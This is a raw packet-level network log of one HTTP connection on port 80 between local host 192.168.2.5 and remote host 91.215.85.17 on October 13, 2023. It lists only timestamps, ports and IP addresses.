Oct 13, 2023 15:20:55.265944004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.266114950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.266186953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.266222954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.266243935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.266339064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.266376972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.266390085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.266762972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.266836882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.266887903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.266958952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267009974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.267061949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267133951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267187119 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.267435074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267513990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267570019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.267615080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267716885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267769098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.267803907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267841101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267882109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267889023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.267919064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.267966986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.267990112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268027067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268076897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.268124104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268160105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268224001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.268255949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268325090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268373966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.268385887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268522978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268578053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.268639088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268708944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268762112 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.268821001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268889904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268924952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.268938065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269021034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269072056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269077063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269114971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269164085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269184113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269220114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269264936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269320965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269390106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269445896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269489050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269598007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269653082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269696951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269736052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269774914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269788027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269844055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269906044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.269915104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269953012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.269988060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270018101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270086050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270123005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270140886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270198107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270256042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270309925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270379066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270443916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270463943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270570993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270606995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270627022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270678997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270730019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270754099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270823002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270878077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270885944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270915031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.270963907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.270986080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271004915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271051884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.271091938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271179914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271238089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.271275043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271356106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271403074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.271470070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271519899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271567106 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.271589994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271666050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271714926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.271728992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271775961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271820068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.271877050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271894932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.271943092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.271998882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272053003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272100925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.272135973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272232056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272283077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272289038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.272370100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272391081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272420883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.272475958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272492886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272538900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.272577047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272624969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.272630930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272737026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272799015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.272870064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272912979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.272962093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.273035049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273113966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273168087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.273202896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273268938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273315907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.273336887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273431063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273447037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273477077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.273509026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273560047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.273586988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273644924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273701906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.273749113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273853064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273891926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.273895979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.273984909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274039984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274076939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274172068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274225950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274251938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274319887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274364948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274370909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274403095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274422884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274461031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274465084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274516106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274559975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274573088 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274626970 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274677992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274714947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274800062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274843931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274876118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274928093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.274980068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.274993896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275048971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275099039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.275131941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275197983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275243044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.275398016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275487900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275531054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.275619030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275685072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275731087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.275793076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275901079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.275944948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.275975943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276042938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276087999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.276088953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276151896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276204109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.276259899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276365995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276410103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.276443958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276561975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276611090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.276623011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276674986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276721001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.276777029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276854038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276901960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.276906967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276967049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.276987076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277029037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.277065992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277100086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277116060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.277194977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277255058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.277295113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277368069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277415037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.277451038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277538061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277594090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.277606010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277690887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277734995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.277759075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277842999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.277894974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.277925014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278016090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278064013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.278099060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278158903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278244019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278254986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.278306961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278366089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.278393984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278511047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278563023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.278599024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278630972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278686047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.278742075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278798103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278848886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.278879881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.278954983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279004097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279006958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.279084921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279134035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.279170990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279241085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279294014 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.279320955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279568911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279614925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279619932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.279675007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279731989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.279771090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279892921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.279942036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.279958010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280056000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280098915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.280126095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280230999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280278921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.280374050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280441999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280493975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280493021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.280599117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280637980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280643940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.280658960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280709982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.280747890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280827045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280869007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.280874968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.280966997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281018972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.281079054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281168938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281220913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.281233072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281333923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281390905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.281407118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281467915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281517982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.281523943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281605005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281622887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281656027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.281677008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281723976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.281764984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281864882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.281914949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.281920910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282020092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282073975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.282087088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282166958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282227039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.282250881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282362938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282381058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282409906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.282449961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282470942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282510042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.282547951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282608986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.282645941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282759905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282809973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.282849073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282949924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.282994032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.283029079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283140898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283195972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.283231020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283303976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283359051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.283373117 CEST	80	49721	91.215.85.17	192.168.2.5
